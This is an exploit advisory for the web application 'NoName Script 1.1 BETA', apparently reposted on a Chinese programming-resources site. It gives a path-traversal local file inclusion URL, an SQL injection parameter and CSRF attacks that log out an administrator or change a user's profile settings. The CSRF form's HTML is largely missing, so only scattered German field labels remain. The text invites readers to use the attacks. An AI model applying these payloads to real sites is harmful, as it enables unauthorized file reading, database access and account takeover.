您现在的位置是:网站首页> 编程资料编程资料

NoName Script _Exploit_网络安全_

2023-05-24 337人已围观

简介 NoName Script _Exploit_网络安全_

################################################################################
[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabilities
[ ] Discovered By SirGod
[ ] www.mortal-team.org
[ ] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
################################################################################# [ ] Local File Inclusion http://localhost/index.php?action=../../../autoexec.bat &kategorie=Tutorial

This will open autoexec.bat . [ ] SQL Injection http://localhost/index.php?action=newsadmindel&file_id=[SQL]

[ ] Cross Site Request Forgery If an logged in user with administrative permisions will click the following link ,he will be logged out. http://localhost/logout.php [ ] Cross Site Request Forgery - Change User Profile If an logged in user with administrative permisions will click the following link the following action will be executed. What to change :

- form action and profil_id :

action : change http://localhost with the website link.
profil_id : id of the user that you want to change settings for it
- input value :
value : your name (corresponding to ID)

And now edit the other settings change via web browser.After that,use this CSRF wisely. [ ] Here is the HTML code :

































































Benutzerinformationen
Benutzername: 
Benutzergruppe: 


Zusätzliche Informationen
Geschlecht: 
Geburtstag: 

Benutzertext: 
Homepage: 
Instant Messaging
ICQ-Nummer: 
MSN-Name: 
AIM-Name: 

Verwarnungen
  Admin wurde noch nicht verwarnt.
Aktion: 
Verwarnungen verwalten
 
 

#################################################################################

上一篇:GeekLog _Exploit_网络安全_

下一篇:Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit _Exploit_网络安全_

相关内容

点击排行

本栏推荐

猜你喜欢

-六神源码网